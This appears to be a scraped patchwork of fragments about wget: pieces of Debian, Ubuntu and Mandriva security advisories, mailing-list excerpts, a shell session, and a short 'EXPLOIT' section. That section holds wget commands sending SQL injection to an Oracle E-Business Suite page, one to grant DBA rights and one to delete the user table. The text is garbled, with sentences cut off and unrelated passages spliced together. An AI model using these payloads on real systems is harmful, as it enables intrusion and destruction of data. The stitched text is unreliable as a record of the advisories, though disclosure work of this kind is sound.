wget
//OK, it is, let's register the IP in a variable for later use:
$ GoogleHost=74.125.65.106
//Let's verify it is working now:
$ wget http://$GoogleHost/ -O /dev/null -T 5
--2009-08-16 21:15:05-- http://74.125.65.106/
Connecting to 74.125.65.106:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `/dev/null'
attackers to conduct man-in-the-middle attacks.
Background
==========
GNU Wget is a free software package for retrieving files using HTTP,
HTTPS and FTP, the most widely-used Internet protocols.
Affected packages
=================
#2010-001 multiple http client unexpected download filename vulnerability
Description:
The lftp, wget and lwp-download applications are ftp/http clients and file
transfer tools supporting various network protocols. The lwp-download
script is shipped along with the libwww-perl library.
Unsafe behaviours have been found in lftp and lwp-download handling the
Content-Disposition header in conjunction with the 'suggested filename'
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
===========================================================
Ubuntu Security Notice USN-842-1 October 06, 2009
wget vulnerability
CVE-2009-3490
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Debian Security Advisory DSA-2088-1 security@debian.org
http://www.debian.org/security/ Florian Weimer
August 05, 2010 http://www.debian.org/security/faq
------------------------------------------------------------------------
Package : wget
Vulnerability : missing input sanitization
Problem type : local (remote)
Debian-specific: no
CVE Id(s) : CVE-2010-2252
Debian Bug : 590296
overwriting of local files.
Problem Description:
A vulnerability has been found and corrected in wget:
GNU Wget before 1.12 does not properly handle a '\0' (NUL) character
in a domain name in the Common Name field of an X.509 certificate,
which allows man-in-the-middle remote attackers to spoof arbitrary SSL
servers via a crafted certificate issued by a legitimate Certification
Authority, a related issue to CVE-2009-2408 (CVE-2009-3490).
Debian Security Advisory DSA-1904-1 security@debian.org
http://www.debian.org/security/ Giuseppe Iuculano
October 09, 2009 http://www.debian.org/security/faq
------------------------------------------------------------------------
Package : wget
Vulnerability : insufficient input validation
Problem type : remote
Debian-specific: no
Debian bug : 549293
CVE ID : CVE-2009-3490
Problem Description:
A vulnerability has been found and corrected in wget:
GNU Wget 1.12 and earlier uses a server-provided filename instead of
the original URL to determine the destination filename of a download,
which allows remote servers to create or overwrite arbitrary files
via a 3xx redirect to a URL with a .wgetrc filename followed by a
3xx redirect to a URL with a crafted filename, and possibly execute
arbitrary code as a consequence of writing to a dotfile in a home
Hi,
Here's a summary of relevant postings to oss-security and bug-wget.
Unofficial patch for wget, by Florian Weimer:
http://www.openwall.com/lists/oss-security/2010/05/17/2
PoC attack on a wget cron job resulting in a .bash_profile overwrite:
http://www.openwall.com/lists/oss-security/2010/05/18/13
Mandriva Linux Security Advisory MDVSA-2009:206
http://www.mandriva.com/security/
_______________________________________________________________________
Package : wget
Date : August 18, 2009
Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
EXPLOIT
=======
Most popular web browsers are not able to display URLs exploiting
this problem. I recommend using wget or lynx instead.
Substitute port 7002 to target Keys Server instead of Protection
Server.
This example will retrieve the C:\boot.ini file.
script called jtfwcpnt.jsp which receives a parameter called "query". I
think that no other explanation is required. Anyway, this is a simple
"exploit" extracted from the presentation:
$ export TARGET="http://<target>:<port>/OA_HTML"
$ wget -O - "$TARGET/OA.jsp" "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;"
$ wget -O - "$TARGET/OA.jsp" "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;"
Just in case you don't want to view the slides online or you hate (or
> # emerge --ask --oneshot --verbose ">=net-misc/openswan-2.4.13-r2"
Ahh. gentoo still uses the openswan-2.4.x version which has been EOL since
early 2008.
Also note that the problematic use was in wget -O. Perhaps one should talk
to the wget people about the symlink attack in their code instead?
Paul
The version of a software to move to stable or to remain in unstable
Gentoo is at the discretion of the maintainer, so I cannot comment on
the reasons for this.
> Also note that the problematic use was in wget -O. Perhaps one should
> talk to the wget people about the symlink attack in their code instead?
>
> Paul
Upgrade instructions
--------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
We recommend that you upgrade your qt4-x11 packages.
user-mode-linux 2.6.26-1um-2+22lenny1
We recommend that you upgrade your nginx package.
We recommend that you upgrade your xulrunner packages.
We recommend that you upgrade your php5 packages.
We recommend that you upgrade your otrs2 packages.
We recommend that you upgrade your phpgroupware packages.
application using the library.
We recommend that you upgrade your audiofile packages.